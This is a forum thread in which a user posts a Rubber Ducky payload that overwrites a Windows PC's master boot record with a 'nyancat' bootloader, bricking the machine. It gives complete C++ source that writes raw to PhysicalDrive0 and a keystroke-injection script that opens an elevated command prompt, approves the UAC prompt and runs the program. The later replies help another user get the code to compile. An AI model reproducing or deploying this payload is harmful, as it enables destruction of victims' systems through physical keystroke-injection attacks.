[DANGEROUS] Nyancat Bootloader Overwrite

[ThoughtfulDev]

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	char *pathToBin = "boot.bin";
	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			if (size > 0){
				byte *mbr = new byte[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfuly read!" << std::endl;
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overritten successfuly!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(binary);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	CloseHandle(drive);
    return 0;
}

2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired uac alt + key kombo (y for yes in english , j for german etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER

 

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier

 

boot.exe

Edited September 29, 2017 by ThoughtfulDev

[Neptunium]

Eh there seems to be an error with the pathToBin char in the code

[Foxtrot]

The code seems fine to me. Make sure you have boot.bin in the same location as the source file.

[Neptunium]

Tried that still won't let me compile, what a shame, Im assuming its broken

[Foxtrot]

What is the error you get? I just compiled it myself, it works fine.

[Neptunium]

Line 10 : HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
pathToBin
Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

[Foxtrot]

4 hours ago, Neptunium said:

Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

This isn't really the source code's problem, but an issue with your compiler configuration. I assume you're using Visual Studio, and if you are - you need to configure your project to use the Multi-Byte Character Set (Found in the project properties under the General section, iirc). You can alternatively cast to a LPCWSTR, but that isn't a better option.

I would recommend reading about the different character types that you will encounter in Windows C++ development here.